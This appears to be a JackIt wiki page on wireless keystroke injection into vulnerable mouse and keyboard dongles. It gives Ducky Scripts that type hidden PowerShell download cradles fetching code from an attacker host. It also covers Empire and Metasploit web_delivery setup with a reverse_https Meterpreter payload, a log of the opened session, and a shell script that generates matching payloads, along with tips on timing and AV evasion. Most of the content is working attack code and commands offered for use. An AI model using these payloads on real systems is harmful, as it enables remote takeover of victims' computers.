Home
The default ducky stager generated by Empire is not recommended. The reason for this is simple: When you use a USB rubber ducky, the assumption is that the user is not physically present. When attacking wirelessly, you may have to inject your attack when the user becomes momentarily distracted. Speed is of the essence.
The other factor to consider is whether the target device uses NRF24 radio frames that incorporate sequence numbering. All MS wireless devices use a 16-bit sequence number field. This means that if the user starts moving their mouse while you're injecting, the sequence numbers of the frames you're sending won't line up anymore. This will result in dropped keystrokes.
The default ducky stager looks something like this:
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc <Base64 Payload>
ENTER
First, the long initial delay is not required: the target's own receiver dongle is already plugged in and enumerated, so unlike a freshly inserted USB Rubber Ducky there is no new device for Windows to detect and no driver to install. Second, most machines can display the Run dialog in less than 200 ms. Finally, there is no need to go through a command prompt; PowerShell can be launched straight from the Run dialog, which removes one window and a 2,000 ms wait.
To shorten the attack, start up Empire and create a listener. After the listener is configured and running, create a stager that points at it:
(Empire) > usestager launcher
(Empire: stager/launcher) > set Listener 1
(Empire: stager/launcher) > set Base64 False
(Empire: stager/launcher) > set OutFile launcher.ps1
(Empire: stager/launcher) > generate
[*] Stager output written out to: launcher.ps1
The next set of commands assumes the callback machine is running Kali Linux. Copy the generated file into the default web root under a short name (here p, to keep the typed URL short) and start the apache2 service:
root@kali:~/empire# cp launcher.ps1 /var/www/html/p
root@kali:~/empire# service apache2 start
Now the ducky script only has to type a standard PowerShell download cradle that fetches the stager from that URL and runs it in memory. For example, my ducky script looks like this:
GUI r
DELAY 200
STRING powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('http://192.168.1.5/p')"
ENTER
Be sure to substitute the URL for your callback machine. We've now cut our injection time down to less than half a second, which shrinks the window in which a stray mouse movement can desynchronize the sequence numbers and makes the attack much more reliable.
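To see how much the shortening buys, the following added script (not part of JackIt or this wiki) totals the DELAYs and the number of keystroke frames in a Ducky Script and turns them into an estimated idle window, the time during which the target must not touch the mouse. The two scripts are constructed copies of the ones above, with a 400-character placeholder standing in for the base64 blob; the per-keystroke cost is an assumed value that you should replace with one you have measured against your own dongle.

```python
"""Estimate the over-the-air injection time of a Ducky Script.

Added example for this wiki page; it is not part of JackIt. The cost
model is an assumption: DELAY n adds n ms, and every transmitted key
(one character of a STRING, or one key or key combo such as "GUI r" or
"ENTER") costs per_key_ms. Measure your own per-key cost; the default
below is only a placeholder.
"""

PER_KEY_MS = 5  # ASSUMED cost of one injected keystroke frame, in ms

# Constructed copies of the two scripts on this page. The base64 blob of
# the default stager is replaced by a 400-character placeholder, roughly
# the size of a small encoded launcher.
DEFAULT_STAGER = """\
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 2000
STRING powershell -W Hidden -nop -noni -enc {}
ENTER
""".format("A" * 400)

SHORT_STAGER = """\
GUI r
DELAY 200
STRING powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('http://192.168.1.5/p')"
ENTER
"""


def script_cost_ms(script, per_key_ms=PER_KEY_MS):
    """Return (delay_ms, keystrokes, total_ms) for a Ducky Script.

    total_ms is the window during which the target must stay idle: a
    mouse movement inside it advances the receiver's sequence counter and
    the remaining injected frames are dropped.
    """
    delay_ms = 0
    keystrokes = 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue  # blank lines and comments send nothing
        cmd, _, arg = line.partition(" ")
        if cmd == "DELAY":
            delay_ms += int(arg)
        elif cmd == "STRING":
            keystrokes += len(arg)  # one frame per character
        else:
            keystrokes += 1  # single key or modifier combo, e.g. "GUI r"
    return delay_ms, keystrokes, delay_ms + keystrokes * per_key_ms


def compare(per_key_ms=PER_KEY_MS):
    """Return {"default": total_ms, "short": total_ms} for both scripts."""
    return {
        "default": script_cost_ms(DEFAULT_STAGER, per_key_ms)[2],
        "short": script_cost_ms(SHORT_STAGER, per_key_ms)[2],
    }


if __name__ == "__main__":
    for name, total in compare().items():
        print("{:8s} {:6d} ms".format(name, total))
```

Whatever per-key figure you plug in, the default stager carries 6,000 ms of fixed DELAY plus several hundred characters of encoded payload, while the short one carries 200 ms and roughly a hundred characters; the length of the typed string is what is left to optimize, which is where a short web root name or a URL shortener helps.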
There are many other ways to stage in a payload. @subTee has a few examples such as this gem. Be creative. URL shorteners are your friend.
Cobalt Strike has a feature called scripted web delivery which can be used to generate a suitable PowerShell one-liner. It is documented on the Cobalt Strike site, and there's a video showing how to use it.
In the video demonstration, Raphael pastes the one-liner into the Run dialog. When using JackIt, keep the Empire ducky script above but swap out the PowerShell command for the Cobalt Strike generated one-liner.
Metasploit has a module called Web Delivery. It includes a PowerShell stager similar to Empire's. To use it, start msfconsole and enter the following commands:
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(web_delivery) > set LPORT 443
LPORT => 443
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(web_delivery) > set SRVHOST 192.168.1.5
SRVHOST => 192.168.1.5
msf exploit(web_delivery) > set SRVPORT 80
SRVPORT => 80
msf exploit(web_delivery) > show options
Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.5      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.5      yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   2   PSH
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.1.5:443
[*] Using URL: http://192.168.1.5:80/vqpo4vnRv6
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.1.5/vqpo4vnRv6');
Use the correct IP addresses or hostnames, and the payload and callback ports of your choice. Your ducky script should look similar to the example below:
GUI r
DELAY 200
STRING powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $W.downloadstring('http://192.168.1.5/vqpo4vnRv6');
ENTER
Launch JackIt and perform the injection attack. You should see your payload callback and a new Meterpreter session:
msf exploit(web_delivery) >
[*] Delivering Payload
[*] https://192.168.1.5:443 handling request from 192.168.1.4; (UUID: rlf3v2nf) Staging Native payload...
[*] Meterpreter session 1 opened (192.168.1.5:443 -> 192.168.1.4:50523) at 2016-07-16 13:30:30 -0400
If you experience issues, remember the following:
- Windows Defender will catch this by default. AV evasion is not in scope for this wiki. There are a million online references about this. Start here.
- Don't cut and paste the example above. You will need to use your own IP address and/or hostname, and the script callback URI is randomly generated unless you set URIPATH yourself, so be sure to copy the exact command Metasploit prints.
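Because the URI is random by default, the ducky script cannot be prepared until msfconsole has printed the one-liner. The added shell script below (not part of JackIt, Metasploit or Empire) pins URIPATH instead and writes both a Metasploit resource script and the matching Ducky Script, so the one-liner JackIt types is known before the handler is even started. The addresses and ports are placeholders; it assumes, as the example on this page does, that SRVHOST is the same address as LHOST.

```sh
#!/bin/sh
# Added example for this wiki page; not part of JackIt, Metasploit or Empire.
# Writes a resource script for exploit/multi/script/web_delivery and the
# matching Ducky Script. URIPATH is pinned rather than left random, so the
# download cradle can be typed by JackIt before msfconsole is started.
#
# Usage: gen_web_delivery LHOST LPORT SRVPORT URIPATH OUTDIR
#   then: msfconsole -q -r OUTDIR/web_delivery.rc
#   and feed OUTDIR/payload.txt to JackIt.
gen_web_delivery() {
    lhost=$1; lport=$2; srvport=$3; outdir=$5
    uripath=${4#/}                      # accept "p" or "/p"
    mkdir -p "$outdir"

    # web_delivery prints the URL without a port when SRVPORT is 80, as in
    # the msfconsole output shown on this page.
    if [ "$srvport" = "80" ]; then
        url="http://${lhost}/${uripath}"
    else
        url="http://${lhost}:${srvport}/${uripath}"
    fi

    # SRVHOST is assumed to be the same interface as LHOST.
    cat > "$outdir/web_delivery.rc" <<EOF
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_https
set LHOST $lhost
set LPORT $lport
set SRVHOST $lhost
set SRVPORT $srvport
set URIPATH /$uripath
exploit -j
EOF

    # Same proxy-aware cradle web_delivery prints, with the pinned URL.
    # The backslashes keep the PowerShell \$W variable out of the shell.
    cat > "$outdir/payload.txt" <<EOF
GUI r
DELAY 200
STRING powershell.exe -nop -w hidden -c \$W=new-object net.webclient;\$W.proxy=[Net.WebRequest]::GetSystemWebProxy();\$W.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX \$W.downloadstring('$url');
ENTER
EOF

    printf '%s\n' "$url"
}

# Example call with placeholder addresses: writes ./out/web_delivery.rc and
# ./out/payload.txt and prints http://192.168.1.5/p
# gen_web_delivery 192.168.1.5 443 80 p ./out
```

Keep the URI short: every character of it is one more radio frame that has to land before the user moves the mouse.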
Some users have reported that special characters do not work correctly. This is most likely caused by the target not using a standard US keyboard layout. We have now added a --layout option with support for several different keyboard layouts. This option is in beta, so let us know if there are any issues.